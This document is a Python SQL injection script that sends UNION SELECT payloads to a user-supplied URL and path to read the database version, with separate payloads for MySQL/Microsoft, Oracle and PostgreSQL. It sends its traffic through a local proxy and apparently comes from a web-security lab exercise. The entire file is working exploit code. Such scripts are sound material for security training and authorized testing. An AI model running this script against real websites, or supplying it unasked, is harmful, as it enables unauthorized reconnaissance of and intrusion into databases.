import requests import sys import urllib3 from bs4 import BeautifulSoup import re # Disable SSL warnings urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) # Proxy settings for debugging PROXIES = {"http": "http://127.0.0.1:8080", "https": "http://127.0.0.1:8080"} def test_payload(url, path, payload): """Send a request with the SQL injection payload and extract the database version.""" try: response = requests.get(f"{url}{path}{payload}", verify=False, proxies=PROXIES) response.raise_for_status() # Raise an exception for HTTP errors except requests.RequestException as error: print(f"[-] Request failed: {error}") return None soup = BeautifulSoup(response.text, "html.parser") version_pattern = re.compile(r"\d{1,2}\.\d{1,2}\.\d{1,2}") version = soup.find(string=version_pattern) # Fix deprecated text argument return version.strip() if version else None def exploit_sqli_version(url, path): """Test different SQL injection payloads to determine the database version.""" payloads = { "Microsoft, MySQL": "' UNION SELECT @@version, NULL%23", "Oracle": "' UNION SELECT * FROM v$version--", "PostgreSQL": "' UNION SELECT version(), NULL--", } for dbms, payload in payloads.items(): print(f"[+] Testing payload for {dbms}...") version = test_payload(url, path, payload) if version: print(f"[+] The database version is: {version} (DBMS: {dbms})") return True print("[-] No version information found with any payload.") return False if __name__ == "__main__": if len(sys.argv) != 3: print(f"[-] Usage: {sys.argv[0]} ") print( f"[-] Example: {sys.argv[0]} http://www.example.com /filter?category=Accessories" ) sys.exit(-1) url, path = sys.argv[1].strip(), sys.argv[2].strip() print("[+] Dumping the version of the database...") if not exploit_sqli_version(url, path): print("[-] Unable to dump the database version.")